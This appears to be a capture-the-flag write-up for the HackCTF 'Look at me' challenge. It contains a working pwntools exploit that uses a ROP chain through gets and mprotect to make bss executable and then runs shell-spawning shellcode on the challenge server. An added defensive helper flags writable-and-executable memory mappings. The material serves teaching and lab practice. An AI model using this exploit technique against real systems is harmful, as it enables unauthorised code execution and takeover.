HackCTF - Look at me

This was material I had seen before on Lazenca.


https://www.lazenca.net/display/TEC/03.ROP%28Return+Oriented+Programming%29+-+mmap%2C+mprotect#id-03.ROP(ReturnOrientedProgramming)mmap,mprotect-ROPcode 

 


I solved it by referring to that material.


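from pwn import *

r = remote('ctf.j0n9hyun.xyz', 3017)
e = ELF('./lookatme')
context.arch = 'i386'
shellcode = asm(shellcraft.i386.sh())

# Addresses inside ./lookatme
gets = 0x804f120
pr = 0x08048480        # pop; ret (clears one argument)
mprotect = 0x806e0f0
pppr = 0x0806f028      # pop; pop; pop; ret (clears three arguments)
bss = 0x80eaf80

# Padding up to the saved return address (bytes, so it also runs on Python 3)
payload = b'A'*28

# Stage 1: gets(bss) reads the shellcode into bss
payload += p32(gets)
payload += p32(pr)
payload += p32(bss)

# Stage 2: mprotect(0x80ea000, 0x2000, 7) marks the pages holding bss RWX,
# then execution returns into bss
payload += p32(mprotect)
payload += p32(pppr)
payload += p32(0x80ea000)
payload += p32(0x2000)
payload += p32(0x7)
payload += p32(bss)

r.sendline(payload)
r.send(shellcode)

r.interactive()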
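
The chain passes 0x80ea000 rather than bss (0x80eaf80) to mprotect because mprotect only accepts a page-aligned address. The following is an added example, not part of the original post: it works out which pages that call covers and shows how a defender can spot the resulting writable and executable mapping in /proc/<pid>/maps. The sample maps text, the path /home/ctf/lookatme, the helper names and the 4 KiB page size are assumptions made for illustration.

```python
import re

PAGE = 0x1000  # assumed 4 KiB pages (i386 Linux)

# Constructed sample: /proc/<pid>/maps as it could look after
# mprotect(0x80ea000, 0x2000, 7). Illustrative layout, not a capture.
SAMPLE_MAPS = """\
08048000-080ea000 r-xp 00000000 08:01 131 /home/ctf/lookatme
080ea000-080ec000 rwxp 000a1000 08:01 131 /home/ctf/lookatme
080ec000-0810f000 rw-p 00000000 00:00 0 [heap]
f7ffc000-f7ffe000 r-xp 00000000 00:00 0 [vdso]
fffdd000-ffffe000 rw-p 00000000 00:00 0 [stack]
"""

LINE = re.compile(
    r"^([0-9a-f]+)-([0-9a-f]+) ([r-][w-][x-][ps]) \S+ \S+ \S+\s*(.*)$"
)


def page_span(addr, length):
    """Range changed by mprotect(addr, length, prot).

    addr must be page-aligned (the kernel returns EINVAL otherwise) and
    length is rounded up to whole pages.
    """
    if addr % PAGE:
        raise ValueError("unaligned addr: mprotect would fail with EINVAL")
    return addr, addr + ((length + PAGE - 1) // PAGE) * PAGE


def writable_executable(maps_text):
    """Return (start, end, path) for every mapping that is both W and X."""
    hits = []
    for line in maps_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        start, end, perms, path = int(m[1], 16), int(m[2], 16), m[3], m[4]
        if "w" in perms and "x" in perms:
            hits.append((start, end, path))
    return hits


def covers(hits, addr):
    """True if addr lies inside any flagged mapping."""
    return any(start <= addr < end for start, end, _ in hits)
```

A file-backed mapping that is both writable and executable, as in the second sample line, is something a W^X policy or a process-memory audit should flag.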
